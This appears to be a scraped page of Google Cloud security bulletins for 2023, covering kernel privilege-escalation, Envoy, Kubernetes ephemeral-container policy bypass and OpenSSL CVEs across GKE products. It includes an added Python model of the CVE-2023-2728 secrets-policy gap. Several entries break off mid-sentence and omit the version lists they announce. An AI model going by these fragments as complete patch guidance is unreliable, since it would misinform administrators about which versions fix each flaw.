A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS clusters are affected. What should I do?What vulnerabilities are addressed by this patch? With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem: qfq_change_class takes the network device's MTU as the lmax value without validating it against the allowed maximum, so a user can trigger the function with an incorrect MTU. This flaw allows a local user to crash the system or potentially escalate their privileges. |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure clusters are affected. What should I do?What vulnerabilities are addressed by this patch? With CVE-2023-31436, an out-of-bounds memory access flaw was found in the Linux kernel's traffic control (QoS) subsystem: qfq_change_class takes the network device's MTU as the lmax value without validating it against the allowed maximum, so a user can trigger the function with an incorrect MTU. This flaw allows a local user to crash the system or potentially escalate their privileges. |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-31436) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?No action is required. |
None |
GCP-2023-016
Published: 2023-06-26
Reference:
CVE-2023-27496,
CVE-2023-27488,
CVE-2023-27493,
CVE-2023-27492,
CVE-2023-27491,
CVE-2023-27487
GKE
Description | Severity |
---|---|
A number of vulnerabilities have been discovered in Envoy, which is used in Cloud Service Mesh (ASM). These were reported separately as GCP-2023-002. GKE does not ship with ASM and is not affected by these vulnerabilities. What should I do?If you have separately installed ASM for your GKE clusters, please see GCP-2023-002. |
None |
GKE on VMware
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487) have been discovered in Envoy, which is used in Cloud Service Mesh in GKE on VMware, that allow a malicious attacker to cause a denial of service or crash Envoy. These were reported separately as GCP-2023-002, but we want to ensure that GKE Enterprise customers update their versions that include ASM. What should I do?The following versions of GKE on VMware have been updated with code to fix these vulnerabilities. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch? CVE-2023-27496: If Envoy is running with the OAuth filter enabled and exposed, a malicious actor could construct a request that crashes Envoy, causing a denial of service. CVE-2023-27488: Attackers can use this vulnerability to bypass authorization checks when ext_authz is used. CVE-2023-27493: Envoy does not sanitize request properties when generating request headers, so characters that are illegal in header values can reach the upstream service; the Envoy configuration must also include an option to add request headers generated from request inputs, such as the peer certificate SAN. CVE-2023-27492: Attackers can send large request bodies for routes that have the Lua filter enabled and trigger crashes. CVE-2023-27491: Attackers can send specially crafted HTTP/2 or HTTP/3 requests to trigger parsing errors on an HTTP/1 upstream service.
CVE-2023-27487: The header |
High |
GKE on AWS
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh. These were reported separately as GCP-2023-002. GKE on AWS does not ship with ASM and is not affected. What should I do?No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487), have been discovered in Envoy, which is used in Cloud Service Mesh. These were reported separately as GCP-2023-002. GKE on Azure does not ship with ASM and is not affected. What should I do?No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A number of vulnerabilities (CVE-2023-27496, CVE-2023-27488, CVE-2023-27493, CVE-2023-27492, CVE-2023-27491, CVE-2023-27487) have been discovered in Envoy, which is used in Cloud Service Mesh in GKE on Bare Metal, that allow a malicious attacker to cause a denial of service or crash Envoy. These were reported separately as GCP-2023-002, but we want to ensure that GKE Enterprise customers update their versions that include ASM. What should I do?The following versions of GKE on Bare Metal have been updated with code to fix these vulnerabilities. We recommend that you upgrade your admin and user clusters to one of the following GKE on Bare Metal versions:
What vulnerabilities are addressed by this patch? CVE-2023-27496: If Envoy is running with the OAuth filter enabled and exposed, a malicious actor could construct a request that crashes Envoy, causing a denial of service. CVE-2023-27488: Attackers can use this vulnerability to bypass authorization checks when ext_authz is used. CVE-2023-27493: Envoy does not sanitize request properties when generating request headers, so characters that are illegal in header values can reach the upstream service; the Envoy configuration must also include an option to add request headers generated from request inputs, such as the peer certificate SAN. CVE-2023-27492: Attackers can send large request bodies for routes that have the Lua filter enabled and trigger crashes. CVE-2023-27491: Attackers can send specially crafted HTTP/2 or HTTP/3 requests to trigger parsing errors on an HTTP/1 upstream service.
CVE-2023-27487: The header |
High |
GCP-2023-015
Published: 2023-06-20
Reference: CVE-2023-0468
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE clusters, including Autopilot clusters, are affected. GKE clusters using GKE Sandbox are not affected. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are being addressed? In CVE-2023-0468, a use-after-free flaw was found in io_poll_check_events in io_uring/poll.c, in the io_uring subcomponent of the Linux kernel. This flaw may cause a NULL pointer dereference and potentially a system crash, leading to a denial of service. |
Medium |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on VMware uses version 5.4 of the Linux kernel and is not affected by this CVE. What should I do?No action is required. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on AWS is not affected by this CVE. What should I do?No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. GKE on Azure is not affected by this CVE. What should I do?No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-0468) has been discovered in version 5.15 of the Linux kernel that can lead to a denial of service on the node. Google Distributed Cloud Virtual for Bare Metal is not affected by this CVE. What should I do?No action is required. |
None |
GCP-2023-014
Published: 2023-06-15
Updated: 2023-08-11
Reference: CVE-2023-2727, CVE-2023-2728
2023-08-11 Update: Added patch versions for GKE on VMware, GKE on AWS, GKE on Azure, and GKE on Bare Metal
GKE
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). GKE does not use ImagePolicyWebhook and is not affected by CVE-2023-2727. All versions of GKE are potentially vulnerable to CVE-2023-2728. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on VMware
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). Anthos on VMware does not use ImagePolicyWebhook and is not affected by CVE-2023-2727. All versions of Anthos on VMware are potentially vulnerable to CVE-2023-2728. What should I do?2023-08-11 Update: The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on AWS
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). What should I do?2023-08-11 Update: The following version of GKE on AWS has been updated with code to fix this vulnerability. Upgrade your nodes to the following GKE on AWS version:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on Azure
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). What should I do?2023-08-11 Update: The following version of GKE on Azure has been updated with code to fix this vulnerability. Upgrade your nodes to the following GKE on Azure version:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
GKE on Bare Metal
Updated: 2023-08-11
Description | Severity |
---|---|
Two new security issues were discovered in Kubernetes where users may be able to launch containers that bypass policy restrictions when using ephemeral containers and either ImagePolicyWebhook (CVE-2023-2727) or the ServiceAccount admission plugin (CVE-2023-2728). What should I do?2023-08-11 Update: The following versions of Google Distributed Cloud Virtual for Bare Metal have been updated with code to fix this vulnerability. Upgrade your nodes to one of the following Google Distributed Cloud Virtual for Bare Metal versions:
What vulnerabilities are being addressed?With CVE-2023-2727, users may be able to launch containers using images that are restricted by ImagePolicyWebhook when using ephemeral containers. Kubernetes clusters are only affected if the ImagePolicyWebhook admission plugin is used together with ephemeral containers. This CVE can also be mitigated by using validation webhooks, such as Gatekeeper and Kyverno, to enforce the same restrictions. In CVE-2023-2728, users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures that Pods running with a service account may only reference secrets specified in the service account's secrets field. Clusters are impacted by this vulnerability if:
|
Medium |
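The mountable-secrets policy that CVE-2023-2728 bypasses, as described in the GCP-2023-014 entries above for every product, modelled in Python as an added example (this is not kube-apiserver code and is not taken from the bulletin): the walk over a Pod spec that the ServiceAccount admission plugin performs when the Pod's service account carries the `kubernetes.io/enforce-mountable-secrets: "true"` annotation, with the pre-fix omission (ephemeralContainers not walked) selectable by a flag so the two behaviours can be compared on the same input. The Pod and ServiceAccount objects are constructed for the example; how the ephemeral container reaches the plugin (the `ephemeralcontainers` subresource) is outside the model.

```python
"""Model of the ServiceAccount admission plugin's mountable-secrets check.

Added example, not kube-apiserver source. The plugin only enforces the policy
when the Pod's service account is annotated
kubernetes.io/enforce-mountable-secrets: "true"; every Secret the Pod
references must then appear in the service account's `secrets` list.
"""

ENFORCE_ANNOTATION = "kubernetes.io/enforce-mountable-secrets"


def _container_secret_refs(container):
    """Secret names a container reads through env/secretKeyRef or envFrom/secretRef."""
    names = set()
    for env in container.get("env", []):
        ref = env.get("valueFrom", {}).get("secretKeyRef")
        if ref:
            names.add(ref["name"])
    for source in container.get("envFrom", []):
        ref = source.get("secretRef")
        if ref:
            names.add(ref["name"])
    return names


def referenced_secrets(pod_spec, include_ephemeral=True):
    """All Secret names a Pod spec references via volumes and container env.

    include_ephemeral=False reproduces the CVE-2023-2728 gap: ephemeral
    containers were not walked, so their env references escaped the policy.
    """
    names = set()
    for vol in pod_spec.get("volumes", []):
        if "secret" in vol:
            names.add(vol["secret"]["secretName"])
        for source in vol.get("projected", {}).get("sources", []):
            if "secret" in source:
                names.add(source["secret"]["name"])
    groups = ["containers", "initContainers"]
    if include_ephemeral:
        groups.append("ephemeralContainers")
    for group in groups:
        for container in pod_spec.get(group, []):
            names |= _container_secret_refs(container)
    return names


def admit(pod_spec, service_account, include_ephemeral=True):
    """Return (allowed, offending_secret_names) for a Pod create/update."""
    annotations = service_account.get("metadata", {}).get("annotations", {})
    if annotations.get(ENFORCE_ANNOTATION) != "true":
        return True, set()  # policy not enabled for this service account
    allowed = {s["name"] for s in service_account.get("secrets", [])}
    offending = referenced_secrets(pod_spec, include_ephemeral) - allowed
    return not offending, offending


# Constructed sample objects (not from a real cluster).
SAMPLE_SA = {
    "metadata": {"name": "app", "annotations": {ENFORCE_ANNOTATION: "true"}},
    "secrets": [{"name": "db-creds"}],
}

SAMPLE_POD = {
    "serviceAccountName": "app",
    "volumes": [{"name": "db", "secret": {"secretName": "db-creds"}}],
    "containers": [{
        "name": "web",
        "env": [{"name": "DB_PASS", "valueFrom": {
            "secretKeyRef": {"name": "db-creds", "key": "password"}}}],
    }],
    # A debug container added later that pulls in a Secret the service
    # account is not allowed to mount.
    "ephemeralContainers": [{
        "name": "debug",
        "envFrom": [{"secretRef": {"name": "cluster-admin-token"}}],
    }],
}

if __name__ == "__main__":
    print("pre-fix walk:", admit(SAMPLE_POD, SAMPLE_SA, include_ephemeral=False))
    print("fixed walk  :", admit(SAMPLE_POD, SAMPLE_SA))
```

The pre-fix walk admits the Pod because the only disallowed reference lives in an ephemeral container; the fixed walk rejects it and names the offending Secret. Note the first check in `admit`: without the annotation the plugin enforces nothing, which is why the bulletin's impact depends on whether any service account in the cluster actually sets it.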
GCP-2023-009
Published: 2023-06-06
Reference: CVE-2023-2878
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE is not affected by this CVE. What should I do?While GKE is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on VMware is not affected by this CVE. What should I do?While GKE on VMware is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on AWS is not affected by this CVE. What should I do?While GKE on AWS is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on Azure is not affected by this CVE. What should I do?While GKE on Azure is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-2878) has been discovered in the secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. GKE on Bare Metal is not affected by this CVE. What should I do?While GKE on Bare Metal is not affected, if you have installed the secrets-store-csi-driver component, you should update your installation with a patched version. What vulnerabilities are addressed by this patch?The vulnerability, CVE-2023-2878, was discovered in secrets-store-csi-driver where an actor with access to the driver logs could observe service account tokens. These tokens could then potentially be exchanged with external cloud providers to access secrets stored in cloud vault solutions. Tokens are only logged when TokenRequests is configured in the CSIDriver object and the driver is set to run at log level 2 or greater via the -v flag. |
None |
GCP-2023-008
Published: 2023-06-05
Reference: CVE-2023-1872
GKE
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE Standard and Autopilot clusters are affected. Clusters using GKE Sandbox are not affected. What should I do?The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?The following versions of GKE on AWS have been updated with code to fix these vulnerabilities: What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. What should I do?The following versions of GKE on Azure have been updated with code to fix these vulnerabilities: What vulnerabilities are addressed by this patch?CVE-2023-1872 is a use-after-free vulnerability in the io_uring subsystem of the Linux kernel that can be exploited to achieve local privilege escalation. The |
High |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2023-1872) has been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE on Bare Metal is not affected by this CVE. What should I do?No action required. |
None |
GCP-2023-005
Published: 2023-05-18
Updated: 2023-06-06
Reference: CVE-2023-1281, CVE-2023-1829
2023-06-06 Update: New GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-1281 and CVE-2023-1829.
GKE
Updated: 2023-06-06
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE Standard clusters are affected. GKE Autopilot clusters and clusters using GKE Sandbox are not affected. What should I do?2023-06-06 Update: Ubuntu patch versions are available. The following GKE versions have been updated to include the latest Ubuntu versions that patch CVE-2023-1281 and CVE-2023-1829:
The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel. What vulnerabilities are addressed by this patch?Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux kernel traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases, which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node.
What should I do?
What vulnerabilities are addressed by this patch? Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux kernel traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases, which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node.
What should I do?
What vulnerabilities are addressed by this patch? Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux kernel traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases, which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node.
What should I do?
What vulnerabilities are addressed by this patch? Both CVE-2023-1281 and CVE-2023-1829 are use-after-free vulnerabilities in the Linux kernel traffic control index filter (tcindex) that can be exploited to achieve local privilege escalation. With CVE-2023-1829, the tcindex_delete function does not properly deactivate filters in certain cases, which can later lead to double freeing of a data structure. In CVE-2023-1281, the imperfect hash area can be updated while packets are traversing, which will cause a use-after-free when |
High |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2023-1281, CVE-2023-1829) have been discovered in the Linux kernel that can lead to a privilege escalation to root on the node. GKE on Bare Metal is not affected by these CVEs.
What should I do? No action required. |
None |
GCP-2023-003
Published: 2023-04-11
Updated: 2023-12-21
Reference: CVE-2023-0240, CVE-2023-23586
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE clusters, including Autopilot clusters, with COS using Linux kernel 5.10 versions earlier than 5.10.162 are affected. GKE clusters using Ubuntu images or using GKE Sandbox are unaffected.
What should I do? The following versions of GKE have been updated with code to fix these vulnerabilities. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch?
Vulnerability 1 (CVE-2023-0240): A race condition in
Vulnerability 2 (CVE-2023-23586): A use after free (UAF) in |
High |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on VMware clusters with COS using Linux kernel 5.10 versions earlier than 5.10.162 are affected. GKE Enterprise clusters using Ubuntu images are unaffected.
What should I do? The following versions of GKE on VMware have been updated with code to fix these vulnerabilities:
What vulnerabilities are addressed by this patch?
Vulnerability 1 (CVE-2023-0240): A race condition in
Vulnerability 2 (CVE-2023-23586): A use after free (UAF) in |
High |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on AWS is not affected by these CVEs.
What should I do? No action required. |
None |
GKE on Azure
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on Azure is not affected by these CVEs.
What should I do? No action required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
Two new vulnerabilities, CVE-2023-0240 and CVE-2023-23586, have been discovered in the Linux kernel that could allow an unprivileged user to escalate privileges. GKE on Bare Metal is not affected by these CVEs.
What should I do? No action required. |
None |
GCP-2023-001
Published: 2023-03-01
Updated: 2023-12-21
Reference: CVE-2022-4696
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Description | Severity |
---|---|
2023-12-21 Update: The original bulletin stated Autopilot clusters are impacted, but this was incorrect. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Unconfined profile or allow
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE clusters, including Autopilot clusters, are impacted. GKE clusters using GKE Sandbox are not affected.
What should I do? The following versions of GKE have been updated with code to fix this vulnerability. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your clusters and node pools to one of the following GKE versions:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-4696, a use-after-free flaw was found in io_uring and IORING_OP_SPLICE in the Linux kernel. This flaw allows a local user to achieve local privilege escalation. |
High |
GKE on VMware
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on VMware clusters running v1.12 and v1.13 are impacted. GKE on VMware clusters running v1.14 or later are not affected.
What should I do? The following versions of GKE on VMware have been updated with code to fix this vulnerability. We recommend that you upgrade your admin and user clusters to one of the following GKE on VMware versions:
What vulnerabilities are addressed by this patch? With CVE-2022-4696, a use-after-free flaw was found in io_uring and IORING_OP_SPLICE in the Linux kernel. This flaw allows a local user to achieve local privilege escalation. |
High |
GKE on AWS
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on AWS is unaffected by this vulnerability.
What should I do? No action is required. |
None |
GKE on Azure
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Azure is unaffected by this vulnerability.
What should I do? No action is required. |
None |
GKE on Bare Metal
Description | Severity |
---|---|
A new vulnerability (CVE-2022-4696) has been discovered in the Linux kernel that can lead to a privilege escalation on the node. GKE on Bare Metal is unaffected by this vulnerability.
What should I do? No action is required. |
None |
GCP-2022-026
Published: 2023-01-11
Reference: CVE-2022-3786, CVE-2022-3602
GKE
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL 3.0 (versions 3.0.0 through 3.0.6) that can potentially cause a crash. While this has been rated High in the NVD database, GKE endpoints use BoringSSL or an older version of OpenSSL that is not affected, so the rating has been reduced to Medium for GKE.
What should I do? The following versions of GKE have been updated with code to fix these vulnerabilities:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your release-specific channel.
What vulnerabilities are addressed by this patch? With CVE-2022-3786 and CVE-2022-3602, a buffer overrun can be triggered in X.509 certificate verification that can cause a crash, resulting in a denial of service. To be exploited, this vulnerability requires either a CA to have signed a malicious certificate or an application to continue certificate verification despite failing to construct a path to a trusted issuer. |
Medium |
GKE on VMware
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL 3.0 (versions 3.0.0 through 3.0.6) that can potentially cause a crash.
What should I do? No action required. GKE on VMware is not affected by these CVEs, as it does not use an impacted version of OpenSSL. |
None |
GKE on AWS
Description | Severity |
---|---|
Two new vulnerabilities (CVE-2022-3786 and CVE-2022-3602) have been discovered in OpenSSL 3.0 (versions 3.0.0 through 3.0.6) that can potentially cause a crash.
What should I do? No action required. GKE on AWS is not affected by these CVEs, as it does not use an impacted version of OpenSSL. |
None |
GKE on Azure
Description | Severity |
---|---|
